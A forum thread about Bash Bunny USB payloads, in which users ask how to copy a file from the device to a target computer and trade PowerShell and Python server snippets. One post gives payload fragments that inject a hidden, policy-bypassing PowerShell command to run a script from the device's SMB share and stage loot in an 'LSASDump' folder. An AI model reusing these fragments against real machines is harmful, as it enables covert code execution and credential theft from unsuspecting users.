Jump to content

Recommended Posts

Posted

Hey guys im trying to figure out a simple code .. 

 

so if i have

 

/root/tesing/test.txt

 

How would i go about of taking that TEXT document on my BB and putting it in there documents folder?

Posted

Powershell would probably be the best way. Maybe not the most efficient...

Create a powershell script that is run by the payload.txt that says something like:

Copy-Item -Path "/root/testing/test.txt" -Destination [Environment]::GetFolderPath("MyDocuments") -Force

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Posted
5 hours ago, Dave-ee Jones said:

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network.

  • Upvote 1
Posted
12 hours ago, Dave-ee Jones said:

Powershell would probably be the best way. Maybe not the most efficient...

Create a powershell script that is run by the payload.txt that says something like:


Copy-Item -Path "/root/testing/test.txt" -Destination [Environment]::GetFolderPath("MyDocuments") -Force

Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer...

Yea that's what I was looking over I know you can access the libary file so maybe in there will work

Posted
17 hours ago, JBNZ said:

Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network.

How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client.

Posted (edited)
3 hours ago, Dave-ee Jones said:

How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client.

A simple and terrible example would be a payload which contained simply:

ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

Edited by JBNZ
Quote Dave-ee to trigger notification of reply.
Posted
5 hours ago, JBNZ said:

A simple and terrible example would be a payload which contained simply:


ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

 
3 hours ago, MaxDamage said:

I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

Hmm, I'll try an see what I can do with that maybe there is a way of blocking the rest? but yes I don't use bash a lot so that's why I'm asking for help :) so thanks, guys I really appreciate all your help!

 

 

Posted
16 hours ago, MaxDamage said:

I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share.

So pretty much get the server setup and then tell it to take the file from my BB an copy it too the computer, because if the BB can access 172.16.64.1 like darren did it can copy that file from the bashbunny over to documents or whatever correcT?

Posted

Yes that is what I did:  here are some snippets from the payload I am working on:

In Payload.txt,  do not forget to install tools...

/pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump

QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\"" 

In my powershell script 'Run.ps1':

#Wait for SMB to get going
while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){
    Start-Sleep 2 
    $I++
    if ($I -eq 10) {break} # dont wait too long.....
}
# Loot Directory
[String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\' 
if (!(Test-Path $P)) {New-Item -Path $P -type directory | Out-Null}

I haven't published as I am still testing but these should help.

 

 

Posted
On 4/1/2017 at 6:38 PM, JBNZ said:

A simple and terrible example would be a payload which contained simply:


ATTACKMODE ECM_ETHERNET
python -m SimpleHTTPServer

Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port.

Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no?

Posted
6 hours ago, Dave-ee Jones said:

Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no?

Yeah it will, it's a pretty standard webserver. If you serve a directory, it'll look for an index.html and serve that first. Alternatively, you can select any HTML file and serve that explicitly. More detail at https://docs.python.org/2/library/simplehttpserver.html

Where are you running PowerShell? Have you installed it on the bunny or are you trying to run a web server on the target host?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...